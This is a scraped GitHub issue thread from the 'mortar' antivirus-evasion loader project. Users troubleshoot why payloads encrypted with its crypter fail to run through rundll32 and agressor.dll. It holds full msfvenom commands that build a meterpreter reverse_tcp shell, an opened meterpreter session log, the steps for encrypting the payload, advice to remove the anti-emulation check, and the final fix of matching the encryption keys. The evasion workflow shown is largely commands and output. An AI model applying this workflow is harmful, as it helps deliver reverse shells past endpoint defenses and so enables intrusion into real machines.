I'm running a fresh Windows 10, updated, with all Defender protection disabled for tes

<a target="_blank" rel="noopener noreferrer nofollow" href="https://user-images.github

<a target="_blank" rel="noopener noreferrer nofollow" href="https://user-

Can't get shellcode or binary to execute,about 0xsp-srd/mortar

Comments (30)

thedepartedpie commented on June 16, 2024 2

Its working for https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc but not for other payloads encrypted with the crypter

from mortar.

lawrenceamer commented on June 16, 2024

it works fine with me, make sure you have compiled the DLL correctly and place the bin.enc in the same folder

from mortar.

lawrenceamer commented on June 16, 2024

i would advise you first to use the following mimikatz first to test if agressor.dll is compiled correctly https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins, if mimikatz works, maybe some issue on your msfvenom payload which is fine on my side

from mortar.

nathan-bowman commented on June 16, 2024

it works fine with me, make sure you have compiled the DLL correctly and place the bin.enc in the same folder

How can I double check that the DLL compiled correctly?

It seems to compile, with some errors...

from mortar.

nathan-bowman commented on June 16, 2024

i would advise you first to use the following mimikatz first to test if agressor.dll is compiled correctly https://github.com/0xsp-SRD/mortar/tree/main/encrypted-bins, if mimikatz works, maybe some issue on your msfvenom payload which is fine on my side

I renamed mimikatz.enc to bin.enc, dropped it in the current working directory with agressor.dll, and ran rundll32.exe agressor.dll,start and rundll32.exe agressor.dll,sh

Both don't work. So, perhaps I'm not compiling agressor.dll properly. Everything seems to compile fine, how can I verify?

from mortar.

lawrenceamer commented on June 16, 2024

are you sure your project config is like that?

from mortar.

nathan-bowman commented on June 16, 2024

are you sure your project config is like that?

I just verified, those are the same settings I have.

Windows Application logs shows Event ID 1000 errors.

Faulting application name: rundll32.exe, version: 10.0.19041.746, time stamp: 0xfb4a9a6b
Faulting module name: KERNELBASE.dll, version: 10.0.19041.1706, time stamp: 0x458acb5b
Exception code: 0xe0465043
Fault offset: 0x0000000000034fd9
Faulting process id: 0x71c
Faulting application start time: 0x01d86f86ae713c8e
Faulting application path: C:\Windows\system32\rundll32.exe
Faulting module path: C:\Windows\System32\KERNELBASE.dll
Report Id: ede56f0a-c881-4752-bfc8-9c112894e97e
Faulting package full name: 
Faulting package-relative application ID:

from mortar.

lawrenceamer commented on June 16, 2024

in order to see why that's happening on your system, let's try shellcode load not the PE
msfvenom -p payload -lhost -lport -f c -o shellcode.bin
and then ecnrypt it, then place the bin.enc with aggressor and execute only agressor.sh

from mortar.

nathan-bowman commented on June 16, 2024

in order to see why that's happening on your system, let's try shellcode load not the PE msfvenom -p payload -lhost -lport -f c -o shellcode.bin and then ecnrypt it, then place the bin.enc with aggressor and execute only agressor.sh

Workflow:

root@localhost:~# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 -f c -o shell.c
[-] No platform was selected, choosing Msf::Module::Platform::Windows from the payload
[-] No arch selected, selecting arch: x64 from the payload
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of c file: 2166 bytes
Saved as: shell.c

C:\Users\user\Documents\GitHub\mortar\Encryptor>encryptor.exe -f \Users\user\Desktop\shell.c -o Users\user\Desktop\bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to \Users\user\Desktop\bin.enc

C:\Users\user\Desktop>dir
 Volume in drive C has no label.
 Volume Serial Number is 749B-11F1

 Directory of C:\Users\user\Desktop

05/24/2022  08:52 AM    <DIR>          .
05/24/2022  08:52 AM    <DIR>          ..
05/24/2022  08:55 AM           850,928 agressor.dll
05/24/2022  09:06 AM             2,888 bin.enc
05/24/2022  10:51 PM             2,166 shell.c

Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,start

Doesn't work:
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

from mortar.

lawrenceamer commented on June 16, 2024

I will do the test on all matching OS with a clean system run. if the issue working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now

from mortar.

nathan-bowman commented on June 16, 2024

I will do the test on all matching OS with a clean system run. if the issue working on my side, maybe your system is not stable or there are other things blocking it. I will keep this issue open for now

Okay! I'm using libvirt kvm/qemu as a hypervisor. (https://libvirt.org/drvqemu.html)

from mortar.

lawrenceamer commented on June 16, 2024

yup that's clear now, i have anti-emulator technique(could some memory allocation), so better to try regular PC or VMs

from mortar.

nathan-bowman commented on June 16, 2024

yup that's clear now, i have anti-emulator technique(could some memory allocation), so better to try regular PC or VMs

It is a VM though... What would be the difference between a VM on VirtualBox or VMWare Workstation vs what I'm using now?

from mortar.

lawrenceamer commented on June 16, 2024

I think that could be (not 100% sure) due to aggressor.dll not being able to allocate memory correctly, so for example in order to divert the AV emulator, the aggressor will try to see if can allocate or not, if not then exit, and I feel that's what happened in your case if you wanna make sure try to remove the following line and retest again
https://github.com/0xsp-SRD/mortar/blob/main/DLL/agressor.lpr#L188

if isEmulated = true  then
  exit
  else

from mortar.

nathan-bowman commented on June 16, 2024

That didn't help with the crashes

from mortar.

nathan-bowman commented on June 16, 2024

Same results with Windows 7 :(

from mortar.

nathan-bowman commented on June 16, 2024

Small update: I installed and updated Windows 10 on Hyper-V. Removed the isEmulated if-statements, set the compiler options to Win64 and x86_64.

And it still doesn't work.

@lawrenceamer What hypervisor are you using?

from mortar.

lawrenceamer commented on June 16, 2024

try to use the following demo for the test https://github.com/0xsp-SRD/mortar/blob/main/demo/bin.enc
then agressor.dll,start

from mortar.

lawrenceamer commented on June 16, 2024

@nathan-bowman the issue was that you using an encryptor(windows version) which is not what should be, in order to encrypt the files you have to use the Linux version of the encryptor, you can do that by installing Lazarus on Kali

apt install fpc 
apt install Lazarus-ide

after that, you can compile the Encryptor only and use it to encrypt windows binaries

from mortar.

lawrenceamer commented on June 16, 2024

while using Linux encryptor, it should work any x64 payload, or EXE that's not (.NET Assembly), I have tested mortar with Msfvenom,cobalt also works fine

from mortar.

nathan-bowman commented on June 16, 2024

while using Linux encryptor, it should work any x64 payload, or EXE that's not (.NET Assembly), I have tested mortar with Msfvenom,cobalt also works fine

The bin.enc you provide does work for me with the agressor.dll I built. Now, trying my own shell...

Build encryptor:

root@localhost:/opt/mortar/Encryptor# lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr
Parameter: recursive
Parameter: os=Linux
Parameter: cpu=x86_64
Hint: (lazarus) primary config path: /root/.lazarus
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: (lazarus) [TBuildManager.SetBuildTarget] Old=x86_64-linux-gtk2 New=x86_64-linux-gtk2 Changed: OS/CPU=True LCL=False
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="" TargetCPU="" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS= TargetCPU= CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) Build Project: nothing to do.
TCompiler.Compile WorkingDir="/opt/mortar/Encryptor/" CompilerFilename="/usr/bin/fpc" CompilerParams=" -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
[TCompiler.Compile] CmdLine="/usr/bin/fpc -B  -Tlinux -Px86_64 -MObjFPC -Scghi -Cg -O1 -g -gl -l -vewnhibq -Fi/opt/mortar/Encryptor/lib/x86_64-linux -Fu/opt/mortar/Encryptor/ -FU/opt/mortar/Encryptor/lib/x86_64-linux/ -FE/opt/mortar/Encryptor/ -o/opt/mortar/Encryptor/encryptor encryptor.lpr"
Hint: [TPCTargetConfigCache.NeedsUpdate] TargetOS="linux" TargetCPU="x86_64" Options="" compiler file changed "/usr/bin/fpc" FileAge=1574718682 StoredAge=0
Hint: [TPCTargetConfigCache.NeedsUpdate] /usr/bin/fpc TargetOS=linux TargetCPU=x86_64 CompilerOptions= ExtraOptions= PATH=/root/.nimble/bin:/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/usr/games:/usr/local/games:/snap/bin:/root/.dotnet/tools:/root/go/bin/:/opt/PEzor:/opt/PEzor/deps/donut/:/opt/PEzor/deps/wclang/_prefix_PEzor_/bin/
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-iWTOTP" "-Px86_64" "-Tlinux"
Hint: (lazarus) [RunTool] "/usr/bin/fpc" "-va" "compilertest.pas" "-Px86_64" "-Tlinux"
Hint: [TPCTargetConfigCache.Update] has changed
Hint: (lazarus) TBuildManager.MacroFuncInstantFPCCache /usr/bin/instantfpc
Hint: (lazarus) [RunTool] "/usr/bin/instantfpc" "--get-cache"
Hint: (lazarus) [TBuildManager.MacroFuncInstantFPCCache] /root/.cache/instantfpc/
Info: (lazarus) Execute Title="Compile Project, Target: encryptor"
Info: (lazarus) Working Directory="/opt/mortar/Encryptor/"
Info: (lazarus) Executable="/usr/bin/fpc"
Info: (lazarus) Param[0]="-B"
Info: (lazarus) Param[1]="-Tlinux"
Info: (lazarus) Param[2]="-Px86_64"
Info: (lazarus) Param[3]="-MObjFPC"
Info: (lazarus) Param[4]="-Scghi"
Info: (lazarus) Param[5]="-Cg"
Info: (lazarus) Param[6]="-O1"
Info: (lazarus) Param[7]="-g"
Info: (lazarus) Param[8]="-gl"
Info: (lazarus) Param[9]="-l"
Info: (lazarus) Param[10]="-vewnhibq"
Info: (lazarus) Param[11]="-Fi/opt/mortar/Encryptor/lib/x86_64-linux"
Info: (lazarus) Param[12]="-Fu/opt/mortar/Encryptor/"
Info: (lazarus) Param[13]="-FU/opt/mortar/Encryptor/lib/x86_64-linux/"
Info: (lazarus) Param[14]="-FE/opt/mortar/Encryptor/"
Info: (lazarus) Param[15]="-o/opt/mortar/Encryptor/encryptor"
Info: (lazarus) Param[16]="encryptor.lpr"
Hint: (11030) Start of reading config file /etc/fpc.cfg
Hint: (11031) End of reading config file /etc/fpc.cfg
Free Pascal Compiler version 3.0.4+dfsg-23 [2019/11/25] for x86_64
Copyright (c) 1993-2017 by Florian Klaempfl and others
(1002) Target OS: Linux for x86-64
(3104) Compiling encryptor.lpr
/opt/mortar/Encryptor/encryptor.lpr(101,3) Note: (5025) Local variable "de" not used
/opt/mortar/Encryptor/encryptor.lpr(102,6) Note: (5025) Local variable "s2" not used
/opt/mortar/Encryptor/encryptor.lpr(103,7) Note: (5025) Local variable "temp" not used
/opt/mortar/Encryptor/encryptor.lpr(104,3) Note: (5025) Local variable "i" not used
/opt/mortar/Encryptor/encryptor.lpr(98,10) Warning: (5033) Function result does not seem to be set
/opt/mortar/Encryptor/encryptor.lpr(146,43) Hint: (5091) Local variable "b64_encoded" of a managed type does not seem to be initialized
(9015) Linking /opt/mortar/Encryptor/encryptor
/usr/bin/ld.bfd: warning: /opt/mortar/Encryptor/link.res contains output sections; did you forget -T?
(1008) 173 lines compiled, 0.3 sec
(1021) 1 warning(s) issued
(1022) 3 hint(s) issued
(1023) 4 note(s) issued
[TCompiler.Compile] end

Build reverse shell:

root@localhost:/opt/mortar/Encryptor# msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=172.x.x.x LPORT=8080 --platform windows --arch x64 -f exe -o /root/shell64.exe
No encoder specified, outputting raw payload
Payload size: 510 bytes
Final size of exe file: 7168 bytes
Saved as: /root/shell64.exe

Test from target Win10:

[*] Meterpreter session 121 opened (172.x.x.x:8080 -> x.x.x.x:20099) at 2022-05-27 14:18:57 +0000

Encrypt:

root@localhost:/opt/mortar/Encryptor# ./encryptor -f /root/shell64.exe -o /root/bin.enc
{!} Mortar Evasion Technique - Encryptor Tool
[+] 0xsp.com @zux0x3a

[+] Encrypting the binary ...
[!] content is written to /root/bin.enc

Both of these fail on target Win10:

C:\Users\user\Desktop>rundll32.exe agressor.dll,start
C:\Users\user\Desktop>rundll32.exe agressor.dll,sh

from mortar.

jad017 commented on June 16, 2024

I have the same issue. It works well with the demo/bin.enc but not with my own payload

from mortar.

lawrenceamer commented on June 16, 2024

it works with meterpreter, at some times you need to execute it 3/4 times to make sure it is being executed on memory,

from mortar.

lawrenceamer commented on June 16, 2024

as I said there are no issues on the mortar side, it is a kind of memory execution delays or could take time to be allocated with executable shellcode or an image, if it fails the first time, execute it 3/4 times to make it work

from mortar.

nathan-bowman commented on June 16, 2024

as I said there are no issues on the mortar side, it is a kind of memory execution delays or could take time to be allocated with executable shellcode or an image, if it fails the first time, execute it 3/4 times to make it work

How exactly are you compiling encryptor?

Like?
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

from mortar.

lawrenceamer commented on June 16, 2024

pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2

from mortar.

nathan-bowman commented on June 16, 2024

pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using:
lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

from mortar.

nathan-bowman commented on June 16, 2024

pushed the compiled version of encryptor https://github.com/0xsp-SRD/mortar/releases/tag/v2

That works! How are you compiling it? I'm using: lazbuild -r --cpu=x86_64 --os=Linux --verbose encryptor.lpr

^^^
@lawrenceamer can you post how you are compiling the encryptor?

from mortar.

goofsec commented on June 16, 2024

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21

from mortar.

nathan-bowman commented on June 16, 2024

Please ensure your keys match inside agressor.lpr and encryptor.lpr. The current version on GitHub uses two different keys for encrypting and decrypting. That's why the shellcode won't run. See also #21

This makes sense, I'll test later. If I don't reply again, it probably means that it worked.

from mortar.

Can't get shellcode or binary to execute about mortar HOT 30 CLOSED

Comments (30)

Related Issues (20)

Recommend Projects

React

Vue.js

Typescript

TensorFlow

Django

Laravel

D3

Recommend Topics

javascript

web

server

Machine learning

Visualization

Game

Recommend Org

Facebook

Microsoft

Google

Alibaba

D3

Tencent

Jobs